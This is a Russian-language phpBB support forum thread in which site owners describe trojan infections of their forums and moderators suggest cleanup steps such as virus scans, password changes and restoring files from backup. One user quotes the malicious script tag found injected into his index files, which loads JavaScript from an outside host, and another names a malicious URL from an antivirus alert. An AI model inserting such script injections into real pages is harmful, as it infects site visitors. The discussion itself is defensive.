Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 18 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Smilley
phpBB 1.0.0
Сообщения: 3
Стаж: 15 лет 5 месяцев

Re: Появилась -0 страница.

Сообщение Smilley »

Спасибо большое, всё заработало. А всвязи с чем такое могло произойти чтобы впредь знать как предотвратить такое.
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 19 лет 10 месяцев
Поблагодарили: 3 раза

Re: Появилась -0 страница.

Сообщение Rayden »

видимо некорректное количество сообщений записалось в таблицу с форумами. Нажатие кнопки "синхро..." пересчитало все заново.
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
potim
phpBB 1.0.0
Сообщения: 7
Стаж: 15 лет 1 месяц

Re: Как убить Трояна?

Сообщение potim »

Подцепил js.redirector.based.2 по версии dr web cureit, первый раз занес с локальной машины.
Почистился вручную, часть из пакета инсталляции, часть вручную. Убрал учетные записи в фтп-менеджере.

Через неделю новое заражение, не совсем понимаю откуда. Подозрение на хвосты с предыдущей чистки.

Пароли не храню (после первого заражения)
От провайдера поддержки нет

Кто чистился, посоветуйте на что обращать внимание?
Какое поведение у вируса, кроме движения по файлам index.* и *.js

Локально машина чистая, проверился сегодняшним CureIt!
Версия phpBB 3.0.7-PL1 спасибо.
Аватара пользователя
GVD
phpBB 1.4.0
Сообщения: 36
Стаж: 18 лет 2 месяца
Откуда: Питер

Re: Как убить Трояна?

Сообщение GVD »

Мою CPG задушили напрочь - это уже происходит совсем не так, как раньше. Прописываются или изменяют практически все файлы галереи.
Всё течёт, всё изменяется.
UmaCat
phpBB 1.0.0
Сообщения: 9
Стаж: 17 лет

Взлом phpbb 3.0.5

Сообщение UmaCat »

Опишу что у меня
может предложите варианты.
форум phpbb 3.0.5
знаю, скажете давно не обновлял - автообновление превышает нагрузку на сервак хостера и никак не получается сделать последнее обновление (теперь уже два последних)
сегодня вечером, обнаруживаю что форум выдает ошибки, антивирус (Avast) вопит что что-то хочет на мой комп вот отсюда

http_://flying-city-2010.com//viewtopic.php\{gzip} [L] JS:Pdfka-AEP [Expl] (0)

начинаю копать через ФТП
обнаруживаю
1. все index.php во всех папках изменены текущим числом
2. везде в них присутствует /includes/hooks/index.php
3. нахожу эту папку, там какой-то файл index.php с заныканным внутри него java-script - явно зашифрованным - потому что понять что там не удалось :)
4. становится стремно, переименовываю папку чтобы не ссылалось, заменяю index.php на старый из комлпекта phpbb3

теперь собственно вопрос
каким образом за 4 минуты (с 13:06 до 13:10), были испорчены ВСЕ файлы на хостинге моем которые были с именем index.php
каким образом можно записать на хостинг новую папку с новым файлом, если я не заходил своим паролем на хостинг-админку уже пару месяцев (знали бы - раньше сломали бы).
другие CMS на хостинге сделаны на php-fusion - знаю система дырявая, но простая, сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере).

Я не спрашиваю что делать :( - понятно что очистить все мне просто не удастся, все надо удалять
Я прошу просто помочь сделать копию БД
воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?
возможны ли проблемы в самой БД?

спасибо
MAzZY
Бывший член :)
Сообщения: 2925
Стаж: 19 лет 11 месяцев
Благодарил (а): 19 раз
Поблагодарили: 30 раз
Забанен: Бессрочно

Re: Взлом phpbb 3.0.5

Сообщение MAzZY »

У Вас на компе вирус.
Действия обычные:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Взлом phpbb 3.0.5

Сообщение MIT »

UmaCat писал(а):сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере)
Этого достаточно :roll:
UmaCat писал(а):воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?
Да
UmaCat писал(а):возможны ли проблемы в самой БД?
Да
UmaCat
phpBB 1.0.0
Сообщения: 9
Стаж: 17 лет

Re: Взлом phpbb 3.0.5

Сообщение UmaCat »

заменил все что было изменено вредными вирусописателями :)
но такое впечатление что форум закешировал страницы, как не входя в админку очистить кеш?
папка cache почищена ( там только свежий index.php и htaccess)
где еще проверить?

просто файлы заменены уже, а все равно браузер показывает что идет обращение к несуществующему файлу

[phpBB Debug] PHP Notice: in file /common.php on line 219: main(./includes/hooks/index.php) [function.main]: failed to open stream: No such file or directory

плин походу у меня в базе хрень эта прописывает
сори, пошел чиститься дальше
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 19 лет 10 месяцев
Поблагодарили: 3 раза

Re: Взлом phpbb 3.0.5

Сообщение Rayden »

UmaCat писал(а):где еще проверить?
Очисть таблицу phpbb_styles_template_data
UmaCat писал(а):includes/hooks/index.php
Проверь наличие файла. Лучше замени чистым и дистрибутива.
phpBB2 FAQ
phpBB3 FAQ
UmaCat
phpBB 1.0.0
Сообщения: 9
Стаж: 17 лет

Re: Взлом phpbb 3.0.5

Сообщение UmaCat »

Всем, спасибо
восстановился.
CureIt нашел кейлоггера на компе.
возможно из-за него

но все равно не понятно, почему умный чел-хакер повредил ВСЕ файлы index.php которые имели хоть какое-то отношение к CMS/форумам (разные - php-fusion / e107/ phpbb3 ) а также все файлы с именем main.php, но при этом совершенно не тронул файлы index.php которые отвечали только за редирект.

странно мне это, это же если за 4 минуты все было сделано явно делалось скриптом, логики не могу найти, неужели в скрипт запихали инфу о большинстве CMS/форумах?

Еще раз спасибо
Аватара пользователя
Addict
phpBB 1.4.0
Сообщения: 30
Стаж: 16 лет 2 месяца
Откуда: мск

Re: Взлом phpbb 3.0.5

Сообщение Addict »

Не стоит хранить пароли в фтп-клиентах.
Аватара пользователя
Nekstati
Поддержка
Поддержка
Сообщения: 3336
Стаж: 16 лет 1 месяц
Благодарил (а): 17 раз
Поблагодарили: 561 раз

Re: Взлом phpbb 3.0.5

Сообщение Nekstati »

И в браузерах не стоит. И на бумажках тоже. Надо тренировать память. Санитар, уведите пациента.
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 20 лет 9 месяцев
Откуда: Бердск

Re: Как убить Трояна?

Сообщение crash »

только пароль написаный фломастером на экране монитора спасет отца русской демократии :)
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
Leviafant
phpBB 1.4.4
Сообщения: 106
Стаж: 18 лет 3 месяца
Откуда: Курск

Re: Как убить Трояна?

Сообщение Leviafant »

Форумом давно не занимаюсь, стоит 3.0.4
вот такой код дописан в индексовых файлах, рад всех разочаровать, я пользуюсь линуксом :lol:
видимо уязвимость все же в скрипте форума

Код: Выделить всё

<script type="text/javascript" src="http://obscurewax.ru/URL.js"></script>
<!--cfae47f881e849f7bf3261c16b6b917c-->
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Как убить Трояна?

Сообщение MIT »

Криворукость страшна под любой осью

Вернуться в «phpBB-пространство»